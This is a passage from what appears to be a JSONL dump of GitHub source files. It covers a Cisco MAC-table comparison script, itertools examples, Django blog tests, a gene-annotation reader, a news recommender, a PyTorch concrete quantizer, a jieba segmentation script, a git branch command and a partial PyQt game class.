to access show int status output -> cmdOutput['show int status']\n        cmdOutput = {}\n        for c in cmd:\n            # print(c)\n            op = con.send_command(c, use_textfsm=True)\n            cmdOutput[c] = op\n\n    newShMacTableOp = cmdOutput['show mac address-table dynamic']\n    ### example value ###\n    # [{'destination_address': '2200.0001.0002',\n    #  'destination_port': 'Gi0/2',\n    #  'type': 'DYNAMIC',\n    #  'vlan': '1'},\n    # {'destination_address': '5000.0011.1111',\n    #  'destination_port': 'Gi0/1',\n    #  'type': 'DYNAMIC',\n    #  'vlan': '1'}]\n\n    # pprint(shMacTableOp)\n\n    combinedOldMacTable = []\n\n    for filename in glob.glob('*.txt'):\n\n        with open(rf\"{templatePath}\\cisco_ios_show_mac-address-table.textfsm\") as template, open(os.path.join(os.getcwd(), filename), 'r') as output:\n            table = textfsm.TextFSM(template)\n            header = table.header\n            result = table.ParseText(output.read())\n            for row in result:\n                row[3] = row[3] + f\" {filename.split('.')[0]}\"\n\n            oldShMacTableOp = convertTxtfsmOp(header, result)\n\n        # pprint(oldShMacTableOp)\n        for v in oldShMacTableOp:\n            combinedOldMacTable.append(v)\n\n    # ----compare and print the 2 mac tables----\n    # NOT TESTED FOR TRUNK PORTS WITH MULTIPLE VLANS YET\n    # once stable, can consider just printing error only\n\n    # header for print output\n    compareHdr = [\"New Port\", \"Old Port + Switch\", \"VLAN\", \"MAC Address\"]\n    finalResult = []\n    for entry in combinedOldMacTable:\n        tmp = []\n        oldPort = entry['destination_port']\n        vlan = entry['vlan']\n        mac = entry['destination_address']\n\n        for nEntry in newShMacTableOp:\n            # if mac is the same\n            if nEntry['destination_address'] == mac:\n                newPort = nEntry['destination_port']\n                # if same vlan\n                if vlan == nEntry['vlan']:\n                    vlanOp = vlan\n                else:\n                    vlanOp = f\"Wrong VLAN- Old: {vlan}\"\n\n                tmp = [newPort, oldPort, vlanOp, mac]\n        # if tmp list is empty, means old mac address does not appear in new switch mac table\n        if not tmp:\n            tmp = [\"NOT FOUND\", oldPort, vlan, mac]\n\n        finalResult.append(tmp)\n\n    print(tabulate(finalResult, headers=compareHdr))\n","repo_name":"neozh3/Cisco-Automation","sub_path":"Switch Migration Scripts/Post Migration/compareMacTable.py","file_name":"compareMacTable.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26368077526","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 25 15:39:51 2022\n\n@author: jack\n\"\"\"\n\n\n\n# 1\nname = 'leo'\nn=37\ns = '{} has {} message.'.format(name,n)\nprint(s)\n\n# 2\nname = 'leo'\nn=37\ns = '{name} has {n} message.' 
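\n# format_map() fills the placeholders by looking up 'name' and 'n' in the mapping returned by vars(), i.e. the local variables.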
\nprint(s.format_map(vars()))\n\n\nname = 'jack'\nn = 43\nprint(s.format_map(vars()))\n\n\n\n\n\n# A way to filter lists\n\"\"\"\nDefinition:\nitertools.compress()\nInput:\nan iterable\na matching sequence of Boolean selectors\nOutput:\nthe elements of the iterable whose selector is True\nUse:\nthis function is very handy when you need to filter one sequence with another, related sequence\neg:\nthe two lists below correspond element by element; based on counts, print the addresses whose count is greater than 5:\n\"\"\"\nfrom itertools import compress\n\naddres = [\n    '123 N apple',\n    '234 N yahoo',\n    '457 E google',\n    '212 N ibm',\n    '987 N hp',\n    '653 W aliyun',\n    '487 N sina',\n    '109 W baidu',\n    ]\n\ncounts = [0,3,10,4,1,7,6,1]\n\nmore5 = [n>5 for n in counts]\n\n\na = list(compress(addres,more5))\nprint(f\"a = {a}\")\n\n#====================================================================\nimport numpy as np\na = np.array([[1, 2], [3, 4], [5, 6]])\nprint(f\"np.compress([0, 1], a, axis=0) = {np.compress([0, 1], a, axis=0)}\")\n\nprint(f\"np.compress([False, True, True], a, axis=0) = {np.compress([False, True, True], a, axis=0)}\")\n\nprint(f\"np.compress([False, True], a, axis=1) = {np.compress([False, True], a, axis=1)}\")\n\n\nprint(f\"np.compress([False, True], a) = {np.compress([False, True], a)}\")\n\n#====================================================================\nimport itertools \nimport operator\nCodes =['C', 'C++', 'Java', 'Python'] \nselectors = [False, False, False, True] \n \nBest_Programming = itertools.compress(Codes, selectors) \n \nfor each in Best_Programming:\n    print(each)\n\n\n\n#====================================================================\nimport itertools \nimport operator \n \n \nexample = itertools.compress('ABCDE', [1, 0, 1, 0, 0]) \n \nfor each in example:\n    print(each)\n\n\n\n# Grouping a complex list with groupby\nrows = [\n    {'city':'nanjing','date':'07/01/2012'},\n    {'city':'beijing','date':'07/04/2012'},\n    {'city':'shanghai','date':'07/02/2012'},\n    {'city':'suzhou','date':'07/03/2012'},\n    {'city':'guangzhou','date':'07/02/2012'},\n    {'city':'tianjin','date':'07/02/2012'},\n    {'city':'chengdu','date':'07/01/2012'},\n    {'city':'wuxi','date':'07/04/2012'},\n    ]\n\nfrom itertools import groupby\n\n\n\nrows.sort(key=lambda r: r['date'])\n\nfor date, items in groupby(rows, key=lambda r: r['date']):\n    print(date)\n    for i in items:\n        print(\"    \",i)\n\n\n\n\n\n","repo_name":"junjiecjj/Python","sub_path":"库示例/生成器迭代器/itertools.py","file_name":"itertools.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7883696867","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom .models import Post\n\nclass BlogTests(TestCase): # class for the blog test\n    \n    def setUp(self): # creating the test user and a Post object to test our model\n        self.user = get_user_model().objects.create_user(\n            username = 'testuser',\n            email = 'test@email.com',\n            password = 'secret'\n        )\n\n        self.post = Post.objects.create(\n            title = 'A good title',\n            body = 'Nice body content',\n            author = self.user,\n        )\n    \n    # testing the string representation of the Post model\n    def test_string_representation(self):\n        post = Post(title = 'A sample title')\n        self.assertEqual(str(post), post.title)\n    \n    # testing the post\n    def test_post_content(self):\n        self.assertEqual(f'{self.post.title}','A good title')\n        self.assertEqual(f'{self.post.author}', 'testuser')\n        self.assertEqual(f'{self.post.body}', 'Nice body content')\n    \n    # Confirming that our home page returns a 200 HTTP status code,\n    # contains our body text, and uses the correct home.html template.\n    def 
test_post_list_view(self):\n response = self.client.get(reverse('home'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Nice body content')\n self.assertTemplateUsed(response, 'home.html')\n \n # testing our detail page and the related urls\n def test_post_detail_view(self):\n response = self.client.get('/post/1/')\n no_response = self.client.get('/post/100000/')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(no_response.status_code, 404)\n self.assertContains(response, 'A good title')\n self.assertTemplateUsed(response, 'post_detail.html')\n \n def test_post_create_view(self):\n response = self.client.post(reverse('post_new'),{\n 'title': 'New title',\n 'body': 'New text',\n 'author': self.user,\n })\n self.assertEquals(response.status_code, 200)\n self.assertContains(response, 'New title')\n self.assertContains(response, 'New text')\n \n def test_post_update_view(self):\n response = self.client.post(reverse('post_edit', args = '1'),{\n 'title': 'Updated title',\n 'body': 'Updated text',\n })\n self.assertEqual(response.status_code, 302)\n \n def test_post_delete_view(self):\n response = self.client.post(reverse('post_delete', args = '1'))\n self.assertEqual(response.status_code, 302)\n ","repo_name":"pkrlfamous/blog-app","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17159648166","text":"import numpy as np\nimport pandas as pd\n\n\ndef read_known_genes(genome, relative_positions=True):\n \"\"\"Reads annotation files derived from UCSC\n :param genome: Genome version (such as hg19, hg38)\n :param relative_positions: Whether exon positions are relative to TSS or chromosomal positions\n :return: dataframe of transcripts\n \"\"\"\n column_names = ['name', 'chrom', 'strand', 'txStart', 'txEnd', 'cdsStart', 'cdsEnd', 'exonCount', 'exonStarts',\n 'exonEnds']\n _transcripts = pd.read_csv('data/knownGene.%s.txt.gz' % genome, sep='\\t', compression='gzip',\n names=column_names, header=None, usecols=list(range(len(column_names))))\n\n kg_xref = pd.read_csv('data/kgXreg.%s.txt.gz' % genome, sep='\\t', compression='gzip',\n names=['name', 'geneSymbol', 'description'], header=None, usecols=[0, 4, 7])\n _transcripts = pd.merge(_transcripts, kg_xref, on='name', how='left')\n\n _transcripts.exonStarts = _transcripts.exonStarts.apply(lambda x: np.array(x.rstrip(',').split(','), dtype=int))\n _transcripts.exonEnds = _transcripts.exonEnds.apply(lambda x: np.array(x.rstrip(',').split(','), dtype=int))\n\n # relative to TSS\n if relative_positions:\n _transcripts.exonStarts = _transcripts.exonStarts - _transcripts.txStart\n _transcripts.exonEnds = _transcripts.exonEnds - _transcripts.txStart\n\n _transcripts.cdsStart -= _transcripts.txStart\n _transcripts.cdsEnd -= _transcripts.txStart\n\n return _transcripts\n","repo_name":"eranroz/polyA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33496639557","text":"#!/usr/bin/env python\n\n\n\"\"\"\nProblem Definition :\n\nThis script creates instances of all the classifiers and trains/tests them. 
It then provides an interface to the\nrecommendation system, where user can select a document from 'n' choices, and system recommends 'm' similar documents,\nwhere 'n' and 'm' are user selected.\n\n\"\"\"\n\n__author__ = 'vivek'\n\nimport time\nimport os\nfrom nb import NaiveBayes\nfrom rank_classifier import RankClassifier\nfrom knn import KNN\nimport random\nfrom document import Document\nfrom tfidf import Index\nfrom kmeans import KMeans\nfrom util import *\nfrom collections import defaultdict, Counter\n\n\ndef recommendation(all_docs, test_docs, classifier_list):\n\n print(\"Recommendation System\")\n print(\"---------------------\")\n\n # ask user for the desired option count and recommendation count. set default value in case invalid inputs.\n try:\n option_count = int(raw_input(\"\\nEnter number of articles to choose from. [number from 5 to 10 suggested]: \"))\n if option_count < 1 or option_count > 20:\n print(\"Invalid Choice.. By default selected 5.\")\n option_count = 5\n except:\n print(\"Invalid Choice.. By default selected 5.\")\n option_count = 5\n\n try:\n k_n = int(raw_input(\"\\nEnter number of recommendation per article. [number from 5 to 10 suggested]: \"))\n if k_n < 1 or k_n > 20:\n print(\"Invalid Choice.. By default selected 5.\")\n k_n = 5\n except:\n print(\"Invalid Choice.. By default selected 5.\")\n k_n = 5\n\n end = False\n\n # run the loop until user quits.\n while not end:\n\n # pick random documents from test docs and provide titles to the user.\n user_docs = random.sample(test_docs, option_count)\n\n while True:\n print(\"\\n---Available Choices For Articles(Titles)---\\n\")\n\n for i in range(len(user_docs)):\n print(str(i+1) + \": \" + user_docs[i].title)\n\n print(\"r: Refresh List\")\n print(\"q: Quit()\\n\")\n\n choice = raw_input(\"Enter Choice: \")\n\n if choice == 'q':\n end = True\n break\n elif choice == 'r':\n break\n else:\n try:\n user_choice = int(choice) - 1\n if user_choice < 0 or user_choice >= len(user_docs):\n print(\"Invalid Choice.. Try Again..\")\n continue\n except:\n print(\"Invalid Choice.. Try Again..\")\n continue\n selected_doc = user_docs[user_choice]\n\n # classifiers are sorted according to their f_measure in decreasing order. It helps when all\n # three classifiers differ in their predictions.\n classifier_list = sorted(classifier_list, key=lambda cl: cl.stats['f_measure'], reverse=True)\n\n prediction_list = list()\n for classifier in classifier_list:\n prediction_list.append(classifier.classify([selected_doc])[0])\n\n prediction_count = Counter(prediction_list)\n top_prediction = prediction_count.most_common(1)\n\n if top_prediction[0][1] > 1:\n prediction = top_prediction[0][0]\n else:\n prediction = prediction_list[0]\n\n # create knn instance using documents of predicted topic. and find k closest documents.\n knn = KNN(all_docs[prediction])\n k_neighbours = knn.find_k_neighbours(selected_doc, k_n)\n\n while True:\n print(\"\\nRecommended Articles for : \" + selected_doc.title)\n for i in range(len(k_neighbours)):\n print(str(i+1) + \": \" + k_neighbours[i].title)\n next_choice = raw_input(\"\\nEnter Next Choice: [Article num to read the article. \"\n \"'o' to read the original article. \"\n \"'b' to go back to article choice list.] \")\n\n if next_choice == 'b':\n break\n elif next_choice == 'o':\n text = selected_doc.text\n print(\"\\nArticle Text for original title : \" + selected_doc.title)\n print(text)\n else:\n try:\n n_choice = int(next_choice) - 1\n if n_choice < 0 or n_choice >= k_n:\n print(\"Invalid Choice.. 
Try Again..\")\n continue\n except:\n print(\"Invalid Choice.. Try Again..\")\n continue\n text = k_neighbours[n_choice].text\n print(\"\\nArticle Text for recommended title : \" + k_neighbours[n_choice].title)\n print(text)\n\n\ndef main():\n\n start_time = time.time()\n\n # Read documents, divide according to the topics and separate train and test data-set.\n\n t_path = \"../dataset/bbc/\"\n\n all_docs = defaultdict(lambda: list())\n\n topic_list = list()\n\n print(\"Reading all the documents...\\n\")\n\n for topic in os.listdir(t_path):\n d_path = t_path + topic + '/'\n topic_list.append(topic)\n temp_docs = list()\n\n for f in os.listdir(d_path):\n f_path = d_path + f\n temp_docs.append(Document(f_path, topic))\n\n all_docs[topic] = temp_docs[:]\n\n fold_count = 10\n\n train_docs, test_docs = list(), list()\n\n for key, value in all_docs.items():\n random.shuffle(value)\n test_len = int(len(value)/fold_count)\n train_docs += value[:-test_len]\n test_docs += value[-test_len:]\n\n # Create tfidf and tfidfie index of training docs, and store into the docs.\n index = Index(train_docs)\n\n print(\"Train Document Count: \" + str(len(train_docs)))\n print(\"Test Document Count: \" + str(len(test_docs)))\n\n test_topics = [d.topic for d in test_docs]\n\n for doc in train_docs:\n doc.vector = doc.tfidfie\n\n for doc in test_docs:\n doc.vector = doc.tf\n\n # create classifier instances.\n nb = NaiveBayes()\n rc = RankClassifier()\n kmeans = KMeans(topic_list)\n \n classifier_list = [rc, nb, kmeans]\n\n for i in range(len(classifier_list)):\n\n print(\"\\nClassifier #\" + str(i+1) + \"\\n\")\n\n classifier = classifier_list[i]\n\n classifier.confusion_matrix, c_dict = init_confusion_matrix(topic_list)\n\n print(\"Training...\\n\")\n\n classifier.train(train_docs)\n\n print(\"Testing... 
Classifying the test docs...\\n\")\n\n        predictions = classifier.classify(test_docs)\n\n        # Update the confusion matrix and statistics with updated values.\n        classifier.confusion_matrix = update_confusion_matrix(test_topics, predictions, classifier.confusion_matrix,\n                                                              c_dict)\n\n        classifier.stats = cal_stats(classifier.confusion_matrix)\n\n        print(\"Confusion Matrix\\n\")\n        for item in classifier.confusion_matrix:\n            print(item)\n\n        print(\"\\nStatistics\\n\")\n        print_table(get_stats_table(classifier.stats))\n\n        print(\"Run time...{} secs \\n\".format(round(time.time() - start_time, 4)))\n\n    # call recommendation system once classifiers are ready.\n    recommendation(all_docs, test_docs, classifier_list)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"vivekpabani/News-Recommendation-System","sub_path":"source_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"24344896313","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import OneHotCategorical, kl_divergence\nimport numpy as np\nimport logging\n\n# from torch.distributions import RelaxedOneHotCategorical\nfrom .pytorch_mods.relaxed_categorical import (\n    ExpRelaxedCategorical,\n    RelaxedOneHotCategorical,\n)\nfrom src.models.simple_module import one_hot_argmax, PackedSequneceUtil\nfrom src import device, cuda_device\nfrom allennlp.nn.util import move_to_device\n\n# module-level logger used by the log.info calls below\nlog = logging.getLogger(__name__)\n\n\nclass AnnealingTemperature(object):\n    \"\"\"\n    tau is updated every N steps\n    tau = max(base_tau, init_tau * exp(-anneal_rate * step))\n    \"\"\"\n\n    def __init__(self, init_tau=1.0, base_tau=0.5, anneal_rate=1e-3, N=500):\n\n        self.init_tau = init_tau\n        self.base_tau = base_tau\n        self.anneal_rate = anneal_rate\n        self.N = N\n\n        self._tau = init_tau\n        self._step = 0\n\n    def step(self):\n        self._step += 1\n        if self._step % self.N == 0:\n            self._tau = np.maximum(\n                self.init_tau * np.exp(-self.anneal_rate * self._step), self.base_tau\n            )\n            log.info(\n                (\"\\nstep: {:d}, update tau: {:.4f}\\n\").format(self._step, self._tau)\n            )\n\n        return self._tau\n\n\n# TODO: if train tau_p: min value > 0, init\nclass KLConcrete(nn.Module):\n    \"\"\"\n    calculate kl (q||p)\n    - posterior q (z|x)\n    - prior p (z)\n\n    careful that tau_p should be positive\n    \"\"\"\n\n    def __init__(\n        self,\n        K,  # number of classes\n        M,  # number of splits\n        kl_type=\"categorical\",  # 'categorical', 'relaxed'\n        logits_p=\"train\",  # 'train', 'uniform'\n        tau_p=1.0,  # 'train', positive float value\n    ):\n        super().__init__()\n\n        l = torch.ones(M, K)\n        # torch.nn.init.orthogonal_(l)\n        if logits_p == \"uniform\":\n            self.logits_p = move_to_device(l, cuda_device)\n        elif logits_p == \"train\":\n            self.logits_p = nn.Parameter(l)\n\n        self.kl_type = kl_type\n        t = torch.FloatTensor(M, 1)\n        if kl_type == \"relaxed\":\n            if tau_p == \"train\":\n                # torch.nn.init.uniform_(t, a=0.1, b=10)\n                t.fill_(1.0)  # init with 1\n                self.tau_p = nn.Parameter(t)\n            else:\n                assert type(tau_p) in [int, float] and tau_p > 0\n                self.tau_p = t.fill_(tau_p)\n                self.tau_p = move_to_device(self.tau_p, cuda_device)\n\n    def forward(self, q, z, logits_q):\n        \"\"\"\n        q: relaxed categorical posterior\n        z: bsz × M × K, sample from q\n        logits_q: bsz × M × K\n        \"\"\"\n        if self.kl_type == \"categorical\":\n            kl = self.kl_categorical(logits_q)\n        elif self.kl_type == \"relaxed\":\n            kl = self.kl_relaxed(q, z)\n        return kl\n\n    def kl_relaxed(self, q, z):\n        \"\"\"\n        Monte Carlo KL with relaxed prior\n\n        it is 
important that the temperature for q is not too small, otherwise log_prob produces nan\n        0.01 is very dangerous, 0.1 sometimes nan, 0.3 generally safe\n        small temperature is dangerous for q but fine for p\n        \"\"\"\n\n        self.tau_p.data.clamp_(min=1e-2, max=10.0)\n        p = RelaxedOneHotCategorical(\n            logits=self.logits_p.expand_as(z), temperature=self.tau_p\n        )\n        # single sample\n        KL_qp = q.log_prob(z) - p.log_prob(z)\n\n        # # multiple sample 100\n        # y = q.rsample([100])\n        # kl = q.log_prob(y) - p.log_prob(y)\n        # KL_qp = kl.mean(dim=0)\n\n        # debug\n        # print('q tau:', q.temperature)\n        # print('p tau:', p.temperature)\n        # print('q:', q.log_prob(z))\n        # print('p:', p.log_prob(z))\n\n        # Raise exception if contains nan\n        if torch.isnan(KL_qp).any():\n            log.info(\"q tau:\" + str(q.temperature.squeeze()))\n            log.info(\"p tau:\" + str(p.temperature.squeeze()))\n            # log.info('q.log_prob: ' + str(q.log_prob(z)))\n            # log.info('p.log_prob: ' + str(p.log_prob(z)))\n            log.info(\"Error: nan log probability for relaxed kl\")\n            nan_mask = torch.isnan(KL_qp)\n            KL_qp = torch.where(torch.isnan(KL_qp), torch.zeros_like(KL_qp), KL_qp)\n            log.info(\n                \"nan length %d out of %d\\n\",\n                nan_mask.sum().item(),\n                torch.tensor(nan_mask.shape).prod(dim=0).item(),\n            )\n            raise RuntimeError(\"nan log probability for relaxed kl\")\n\n        return KL_qp\n\n    def kl_categorical(self, logits_q):\n        # Analytical KL with categorical prior\n        p_cat = OneHotCategorical(logits=self.logits_p.expand_as(logits_q))\n        q_cat = OneHotCategorical(logits=logits_q)\n        KL_qp = kl_divergence(q_cat, p_cat)\n        return KL_qp\n\n\n# TODO: if train tau: min value > 0, init\nclass ConcreteRelaxation(nn.Module):\n    \"\"\"\n    z: latent sampled from posterior q (z|x)\n    \"\"\"\n\n    def __init__(\n        self,\n        hard=True,  # True - Straight Through Gumbel, False - GumbelSoftmax\n        tau_mode=\"fix\",  # 'fix', 'anneal', 'train'\n        # for q temperature\n        init_tau=1.0,  # for anneal, fix\n        base_tau=0.5,  # for anneal\n        anneal_rate=1e-4,  # for anneal\n        update_tau_every=1000,  # for anneal\n        # for KL\n        K=10,\n        M=2,\n        kl_type=\"categorical\",  # 'relaxed', 'categorical'\n        logits_p=\"train\",  # 'train', 'uniform'\n        tau_p=1.0,  # 'train', fixed positive float\n    ):\n        super().__init__()\n\n        self.hard = hard\n        if hard:\n            assert kl_type == \"categorical\"\n\n        self.KL = KLConcrete(K=K, M=M, kl_type=kl_type, logits_p=logits_p, tau_p=tau_p)\n\n        self.tau_mode = tau_mode\n        t = torch.FloatTensor(M, 1)\n        if tau_mode == \"train\":\n            # torch.nn.init.uniform_(t, a=0.5, b=10)\n            # t.fill_(1.0)\n            t.fill_(init_tau)\n            self.tau = nn.Parameter(t)\n        else:\n            assert type(init_tau) in [int, float] and init_tau > 0\n            self.tau = t.fill_(init_tau)\n            self.tau = move_to_device(self.tau, cuda_device)\n            if tau_mode == \"fix\":\n                pass\n            elif tau_mode == \"anneal\":\n                self.tau_scheduler = AnnealingTemperature(\n                    init_tau=init_tau,\n                    base_tau=base_tau,\n                    anneal_rate=anneal_rate,\n                    N=update_tau_every,\n                )\n\n    def forward(self, logits_q):\n        \"\"\"\n        Draw sample and calculate KL\n        logits_q: bsz × M × K\n        \"\"\"\n\n        self.tau.data.clamp_(min=3e-1, max=10.0)\n        q = RelaxedOneHotCategorical(logits=logits_q, temperature=self.tau)\n        # draw soft sample with reparameterization, preserve gradient\n        z = q.rsample()\n\n        # cast into hard sample\n        if self.hard:\n            z_hard = one_hot_argmax(z)\n            # straight through gradient, hard sample has same gradient as soft sample\n            z = (z_hard - z).detach() + z\n\n        # calculate kl\n        kl = self.KL(q, z, logits_q)\n\n        # update tau during training, CAUTION: only call forward once within a batch\n        # do not update if eval\n        if self.tau_mode == \"anneal\" and self.training:\n            tau_value = self.tau_scheduler.step()\n            # self.tau = self.tau.fill_(tau_value)\n            self.tau = move_to_device(\n                torch.FloatTensor(self.tau.shape).fill_(tau_value), cuda_device\n            )\n\n        return {\"z\": z, \"kl\": kl}\n\n    def check_paramater(self, config):\n        tau_q = self.tau.data.squeeze()\n        print(\"\\ntau_q mode: \", config.concrete.tau.mode)\n        print(\"tau_q: \", tau_q)\n\n        logits_p = self.KL.logits_p\n        print(\"\\nlogits_p mode: \", config.concrete.kl.prior_logits)\n        print(\"probs_p: \", torch.softmax(logits_p, dim=-1)[0])\n\n        if hasattr(self.KL, \"tau_p\"):\n            tau_p = self.KL.tau_p.data.squeeze()\n            print(\"\\ntau_p mode: \", config.concrete.kl.prior_tau)\n            print(\"tau_p: \", tau_p)\n\n\nclass ConcreteQuantizer(nn.Module):\n    \"\"\"\n    Continuous relaxation of categorical distribution (the two are equivalent)\n    Concrete distribution: https://arxiv.org/pdf/1611.00712.pdf\n    Gumbel-Softmax distribution: https://arxiv.org/abs/1611.01144\n    \"\"\"\n\n    def __init__(self, config, num_embeddings, embedding_dim, split):\n        super().__init__()\n\n        self.K = num_embeddings\n        self.D = embedding_dim\n        self.M = split\n\n        self.concrete = ConcreteRelaxation(\n            hard=(config.concrete.hard == 1),\n            tau_mode=config.concrete.tau.mode,\n            init_tau=config.concrete.tau.init,\n            base_tau=config.concrete.tau.anneal.base,\n            anneal_rate=config.concrete.tau.anneal.rate,\n            update_tau_every=config.concrete.tau.anneal.interval,\n            K=self.K,\n            M=self.M,\n            kl_type=config.concrete.kl.type,\n            logits_p=config.concrete.kl.prior_logits,\n            tau_p=config.concrete.kl.prior_tau,\n        )\n\n        self.embeddings = nn.Parameter(torch.randn(self.M, self.K, self.D))\n\n        # set to true when classification\n        # freeze this part, but train modules on top\n        self.force_eval = False\n\n    def forward(self, logits):\n        \"\"\"\n        Case 1: sequence of vector\n        Arg: logits - bsz x T x (M * K), tensor\n                    - or N x (M * K), packed sequence\n        Return: quantized - bsz x T x (M * D)\n\n        Case 2: single vector\n        Arg: logits - bsz x (M * K), tensor\n        Return: quantized - bsz x (M * D)\n        \"\"\"\n\n        # support PackedSequence\n        packed_seq_util = PackedSequneceUtil()\n        logits = packed_seq_util.preprocess(logits)\n\n        # reshape logits: B_flatten x M x K\n        # with B_flatten = bsz, or bsz * T, or N\n        bsz = logits.shape[0]\n        assert logits.shape[-1] == self.M * self.K\n        logits = logits.view(-1, self.M, self.K)\n\n        # z: B_flatten x M x K\n        if self.training and not self.force_eval:\n            # use concrete when train\n            out = self.concrete(logits)\n            z = out[\"z\"]\n            kl = out[\"kl\"].sum()\n        else:\n            # simple argmax when eval\n            z = one_hot_argmax(logits)\n            kl = 0.0\n            out = None\n\n        # B_flatten x M x D\n        quantized_stack = z.transpose(0, 1).bmm(self.embeddings).transpose(0, 1)\n        # if prob is not one-hot, this is not exact index\n        encoding_indices = torch.argmax(z, dim=-1)\n\n        if packed_seq_util.is_packed:\n            quantized_stack = packed_seq_util.postprocess(quantized_stack, pad=0.0)\n            quantized = quantized_stack.view(\n                [*quantized_stack.shape[:-2]] + [self.M * self.D]\n            )\n            encoding_indices = packed_seq_util.postprocess(encoding_indices, pad=-1)\n            z = packed_seq_util.postprocess(z, pad=0.0)\n        else:\n            quantized_stack = quantized_stack.view(bsz, -1, self.M, self.D).squeeze(1)\n            quantized = quantized_stack.reshape(bsz, -1, self.M * self.D).squeeze(1)\n            encoding_indices = encoding_indices.view(bsz, -1, self.M).squeeze(1)\n            z = z.view(bsz, -1, self.M, self.K).squeeze(1)\n\n        return {\n            # B x T (optional) x (M * D)\n            \"quantized\": quantized,\n            # B x T (optional) x M x D\n            
\"quantized_stack\": quantized_stack,\n # B x T (optional) x M\n \"encoding_indices\": encoding_indices,\n # kl sum\n \"kl\": kl,\n }\n","repo_name":"shuningjin/discrete-text-rep","sub_path":"src/models/concrete_quantizer.py","file_name":"concrete_quantizer.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"42804908427","text":"# coding=utf-8\nimport os\nimport jieba\nimport time\nimport threading\n\n# 目前cpu利用率仅占120%\n\n#往文件写要加这个\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nthreads = [] # 线程池\n\ndef thread(file, write_path):\n print(file + ':processing......')\n start_each = time.clock()\n with open(write_path, 'a+') as wf:\n with open(file) as rf:\n\n for line in rf:\n if line.startswith('') or line.startswith(''):\n continue\n seg_list = jieba.cut(line)\n list = []\n for word in seg_list:\n if (not word.__eq__(' ')) and (not word.__eq__(' ') and (not word.__eq__('\\t'))):\n list.append(word)\n wf.write(' '.join(list))\n end_each = time.clock()\n print(file + \":用时{0}s\".format(end_each - start_each))\n\n# 将文件夹下所有的文件分词并写出到一个文件里\ndef run(file_document_path,write_path):\n # 在linux中地址不用转码的\n # file_document_path = unicode(file_document_path, \"utf8\")\n # write_path = unicode(write_path, \"utf8\")\n start = time.clock()\n\n file_list = os.listdir(file_document_path)\n for file in file_list:\n # print file.decode('gbk') # window\n # print file # linux\n # 多线程\n\n threads.append(threading.Thread(target=thread, args=(file_document_path+file, write_path+file)))\n\n for t in threads:\n t.setDaemon(True) # 将线程声明为守护线程,必须在start()调用之前设置,不设置将会无限挂起\n t.start()\n threads.join() # 在子线程完成之前父线程会已知阻塞,防止提前结束\n\n end = time.clock()\n print(\"共用时{0}s\".format(end-start))\n pass\n\n\n\nif __name__ == '__main__':\n\n ## windows\n # run('D:/NLP/语料/sogouT/test/','D:/NLP/语料/sogouT/test.merge')\n\n ## linux\n run('/home/guanpf/语料/sogouT/test/','/home/guanpf/语料/sogouT/segment/')\n","repo_name":"flygoinggoing/sogouT","sub_path":"segment/segment_thread.py","file_name":"segment_thread.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21600474924","text":"from .base import BaseCommand\nfrom ..reference import Reference\n\n\nclass BranchCreateCommand(BaseCommand):\n\n\tdef run(self, name):\n\t\theads = self.repository.references(\"heads\")\n\t\thead = self.repository.head()\n\n\t\tif heads.contains(name):\n\t\t\tprint(\"fatal: A branch named '%s' already exists.\" % name)\n\t\t\texit(5)\n\n\t\tref = Reference(name, head.expanded_sha)\n\n\t\theads.store(ref)\n","repo_name":"damian-rzeszot/git-py","sub_path":"git/commands/branch_create.py","file_name":"branch_create.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18089922799","text":"# importing libraries \nimport sys \n\nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import * \n\nfrom Room import Room\nimport config\n\nclass Cabinet(Room):\n \"\"\"\n Balcony window to pop up when player navigates to the Balcony Location\n \"\"\"\n def __init__(self):\n super().__init__(\"Cabinet\") \n # Calling the user interface function\n\n self.setRoomButtons()\n self.setInteractionButtons()\n self.setEasterEggButtons()\n\n def setRoomButtons(self):\n \t# Setting up buttons and other room windows\n self.kitchenButton = 
